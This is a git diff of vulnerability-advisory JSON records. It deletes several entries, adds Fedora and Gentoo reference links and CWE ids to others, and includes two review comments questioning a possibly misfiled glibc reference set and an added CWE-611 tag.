@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xp44-8vwr-xwmv", - "modified": "2023-03-01T03:30:29Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10428" - ], - "details": "Jenkins Aqua Security Scanner Plugin 3.0.17 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10428" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1508" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json b/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json deleted file mode 100644 index fc2eec0bf5402..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xr3x-62qw-vc4w", - "modified": "2023-02-10T18:30:30Z", - "published": "2022-05-24T17:24:21Z", - "aliases": [ - "CVE-2020-11110" - ], - "details": "Grafana through 6.7.1 allows stored XSS.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11110" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200810-0002/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-07-27T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json b/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json deleted file mode 100644 index dabfbdd53a08a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json +++ /dev/null 
@@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xv6x-43gq-4hfj", - "modified": "2022-05-02T03:40:08Z", - "published": "2022-05-02T03:40:08Z", - "aliases": [ - "CVE-2009-2940" - ], - "details": "The pygresql module 3.8.1 and 4.0 for Python does not properly support the PQescapeStringConn function, which might allow remote attackers to leverage escaping issues involving multibyte character encodings.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2940" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37046" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37654" - }, - { - "type": "WEB", - "url": "http://ubuntu.com/usn/usn-870-1" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2009/dsa-1911" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/59028" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-22T16:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json b/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json deleted file mode 100644 index 25313b70818e2..0000000000000 --- a/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9394-xfq9-6qrp", - "modified": "2022-06-15T00:00:23Z", - "published": "2022-06-07T00:00:33Z", - "aliases": [ - "CVE-2022-28224" - ], - "details": "Clusters using Calico (version 3.22.1 and below), Calico Enterprise (version 3.12.0 and below), may be vulnerable to route hijacking with the floating IP feature. Due to insufficient validation, a privileged attacker may be able to set a floating IP annotation to a pod even if the feature is not enabled. This may allow the attacker to intercept and reroute traffic to their compromised pod.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28224" - }, - { - "type": "WEB", - "url": "https://www.tigera.io/security-bulletins-tta-2022-001/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-20" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-06-06T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json b/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json index 6f2881fe6c19d..a902959c7920d 100644 --- a/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json +++ b/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-385" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json b/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json index 750822794fd35..89d8d850ffdeb 100644 --- a/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json 
+++ b/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json @@ -33,6 +33,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" @@ -41,6 +49,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221007-0007/" diff --git a/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json b/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json index 057ee17cbaf21..0f60903e32fee 100644 --- a/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json +++ b/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" 
@@ -45,6 +49,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1037" @@ -57,6 +65,10 @@ "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5207" }, + { + "type": "WEB", + "url": "https://www.secpod.com/blog/retbleed-intel-and-amd-processor-information-disclosure-vulnerability/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/12/2" diff --git a/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json b/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json index cea67e9418fff..647dbbb2fb19a 100644 --- a/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json +++ b/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json @@ -21,6 +21,22 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23825" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KLSRW4LLTAT3CZMOYVNTC7YIYGX3KLED/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" 
@@ -37,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1037" diff --git a/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json b/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json index 7193e1d4d38e2..ff2423b9af617 100644 --- a/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json +++ b/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json @@ -40,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-200" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json b/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json index d8cbc628122fa..5f59faeb12434 100644 --- a/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json +++ b/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://crbug.com/1323449" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4NMJURTG5RO3TGD7ZMIQ6Z4ZZ3SAVYE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4NMJURTG5RO3TGD7ZMIQ6Z4ZZ3SAVYE/" diff --git a/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json b/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json index d1f2be1e5e2f8..8ee2d8497c9b8 100644 --- a/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json +++ b/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json 
@@ -32,6 +32,22 @@ { "type": "WEB", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=29536" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json b/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json index 05d6bbd3bc499..21a98caeda554 100644 --- a/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json +++ b/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/redis/redis/commit/0bf90d944313919eb8e63d3588bf63a367f020a3" }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.211962" + }, { "type": "WEB", "url": "https://vuldb.com/?id.211962" diff --git a/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json b/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json index 5af1aa35f9f0e..875259c22a95b 100644 --- a/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json +++ b/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json 
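Review bot: The four references added to GHSA-f6rj-qrpf-jc34 (a Packet Storm item titled glibc-syslog-Heap-Based-Buffer-Overflow plus oss-security and full-disclosure posts from 30 January and February 2024) look like they concern the glibc syslog disclosure published in January 2024 rather than the 2022 sourceware bug 29536 that the unchanged context line cites, so it is worth confirming they belong on this advisory rather than the later one before merging. Reference lists are what triagers use to locate the fix for the entry's own CVE, and a mis-filed link sends them to a different bug. If the links were inherited from an upstream record that cross-references both issues, a sentence in the commit description saying so would save the next reader the same check.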
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33748" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json b/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json index e8778c126a1de..0bf7897e57a40 100644 --- a/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json +++ b/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33746" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" @@ -52,7 +68,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-404" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json b/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json index 0bc0cadac2489..5db8dd75237c5 100644 --- a/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json +++ b/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33749" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-413.txt" 
@@ -36,7 +40,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json b/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json index a83d479d21656..7390d3b790d95 100644 --- a/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json +++ b/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33747" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" @@ -52,7 +68,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-404" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json b/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json index 67a0e0492f377..79e76754f4422 100644 
--- a/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json
+++ b/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json
@@ -21,6 +21,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42324"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/"
@@ -33,6 +45,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2022/dsa-5272"
@@ -52,7 +68,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-681"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json b/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json
index 3a728b5631a40..6679f05d5f1b0 100644
--- a/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json
+++ b/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json
@@ -32,6 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-611",
 "CWE-776"
 ],
 "severity": "HIGH",
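Review bot: In the GHSA-5x8p-x36c-4gwr hunk, `"CWE-611"` (XML external entity reference) is added beside the existing `"CWE-776"` (unrestricted recursive entity expansion); these are distinct weaknesses with different impact — file disclosure or SSRF through resolved external entities versus resource exhaustion from nested internal entities — and carrying both is only accurate if the advisory text describes external entity resolution as well as expansion. The `details` field is outside this hunk, so the diff alone does not show which applies; please confirm against the upstream write-up before both tags are published, since downstream consumers filter and prioritize on `cwe_ids`. If only the expansion issue is documented, the array should stay as the original single entry `"CWE-776"`.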
diff --git a/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json b/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json index abffa68b0cec8..87528ce2628e8 100644 --- a/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json +++ b/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json b/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json index d96b67efca175..d166abfdd67e5 100644 --- a/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json +++ b/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42322" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" 
diff --git a/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json b/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json index 392f9b0098ac2..d26796e6d1d68 100644 --- a/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json +++ b/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42326" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json b/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json index 129a4fd8ba2c7..71b47aa355d84 100644 --- a/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json +++ b/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json 
